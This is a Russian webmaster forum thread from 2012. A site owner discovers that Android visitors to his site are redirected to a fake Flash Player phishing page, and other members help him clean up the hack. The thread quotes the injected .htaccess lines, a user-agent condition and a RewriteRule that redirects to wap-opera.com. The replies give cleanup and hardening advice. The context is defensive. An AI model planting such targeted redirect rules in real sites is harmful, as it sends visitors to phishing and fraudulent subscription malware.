АРМАДА
На сайте появился несакнционированный редирект с андроид
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг

EdwardSn +
Профессионал
Зарегистрирован: 22.11.2009
Сообщений: 985
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 6:39 pmДобавить в избранноеОтветить с цитатой
Помогите кто может.
Предполагаю, что сайт взломан. В частности при заходе с мобильного под ОС андроид происходит редирект на фишинговый сайт с Adobe Flash Player.
Где поискать и удалить редирект? Вот адрес сайта
Блог

JM
Гуру
Зарегистрирован: 25.08.2006
Сообщений: 1382
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 7:54 pmОтветить с цитатой
Если прикинуться симбой то тоже редирект...
смари .htaccess
и индекс сайта само собой...
если все чисто плагин в апачь впиздурили тебе Sad
Конвертит мобильный траф как зверь!!!
VDS и домены от AHnames.com - лучшие решения по доступным ценам

EdwardSn +
Профессионал
Зарегистрирован: 22.11.2009
Сообщений: 985
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 9:22 pmОтветить с цитатой
Спасибо, оюнаружил в htaccess такой код
RewriteRule ^(.*)$ http://wap-opera.com/in.cgi?a [L,R=302]
Убрал его теперь все нормально.
Кстати надо ли убирать строки типа RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
И что сделать чтобы такое не повторялось?
Блог

Yabuti
V.I.P.
Зарегистрирован: 28.11.2008
Сообщений: 16263
Contest (Сумма: 2)
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 9:41 pmОтветить с цитатой
Сменить все пароли, проверить комп, увели акк или самого хостера поломали (встречал такое, только с дефейсом).
Поставить более жесткие chmod'ы на htaccess и исполняемые файлы, а также папки.
Проверить файлы сайта на наличие бэкдоров и шеллов.
Поставить плагин\модуль защиты от вредоносных изменений.
Накатать абузу на сайт wap-opera.com. Если это платник партнерки - отписать им в саппорт, пусть забанят хакера, льющего с ломов, заморозив его средства.
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
--

JM
Гуру
Зарегистрирован: 25.08.2006
Сообщений: 1382
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 9:42 pmОтветить с цитатой
Вот что бы не повторилось эт интересный вопрос... сначала права на запись убери (444 на файл), что за движок стоит что бы понять как было сломанно, что за хост, есть ли вероятность слома твоего компа (тупо уперли фтп или шелл)
Может вообще соседа сломали если это виртуал...
Пусть супор логи посмотрим на серваке...
Конвертит мобильный траф как зверь!!!
VDS и домены от AHnames.com - лучшие решения по доступным ценам

JM
Гуру
Зарегистрирован: 25.08.2006
Сообщений: 1382
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 9:42 pmОтветить с цитатой
строчки все такого плана можешь убрать в принципе (ну или закоментировать их #)
RewriteCond %{HTTP_USER_AGENT}
Конвертит мобильный траф как зверь!!!
VDS и домены от AHnames.com - лучшие решения по доступным ценам

TheProLamer
Опытный
Зарегистрирован: 19.09.2011
Сообщений: 236
Обратиться по нику
# Добавлено:Вс Авг 12, 2012 9:47 pmОтветить с цитатой
EdwardSn писал(а):

И что сделать чтобы такое не повторялось?



я так думаю, нужно почистить комп от вирусняка(нормальным антивирем а не любимым многими авастом), сменить пароли везде... если ситуация повторится - сменить хостинг.

HeavyHell
Опытный
Зарегистрирован: 10.09.2010
Сообщений: 240
Обратиться по нику
# Добавлено:Пн Авг 13, 2012 8:52 pmОтветить с цитатой
99% что заодно валяется теперь на сайте вебшел... так что попроси к примеру меня его поискать :D

EdwardSn +
Профессионал
Зарегистрирован: 22.11.2009
Сообщений: 985
Обратиться по нику
# Добавлено:Вт Авг 14, 2012 1:03 pmОтветить с цитатой
Цитата:
99% что заодно валяется теперь на сайте вебшел.

. Прошу прощения за нубовский вопрос, а что это такое?
Кстати у меня на этом же хостинге и другие сайты, там тот же редирект воткнули.
А вообще возможный заработок хакеров впечатляет, так как по этой партнгерке в случае инсталяции файла пвседо флэш плеера снимается 147 руб. единовременно + подписка 20,47 в день. При этом такой редирект не сразу обнаружишь, сам его нашел случайно, когда был в гостях у знакомого и показал ему свой сайт с его планшета.
Блог

JM
Гуру
Зарегистрирован: 25.08.2006
Сообщений: 1382
Обратиться по нику
# Добавлено:Вт Авг 14, 2012 1:09 pmОтветить с цитатой
https://www.google.com/search?q=%D0%B2%D0%B5%D0%B1%D1%88%D0%B5%D0%BB&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:ru:official&client=firefox
Конвертит мобильный траф как зверь!!!
VDS и домены от AHnames.com - лучшие решения по доступным ценам

EdwardSn +
Профессионал
Зарегистрирован: 22.11.2009
Сообщений: 985
Обратиться по нику
# Добавлено:Вт Авг 14, 2012 1:53 pmОтветить с цитатой
Есть люди к которым можно обратиться проверить аккаунты?
Блог
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры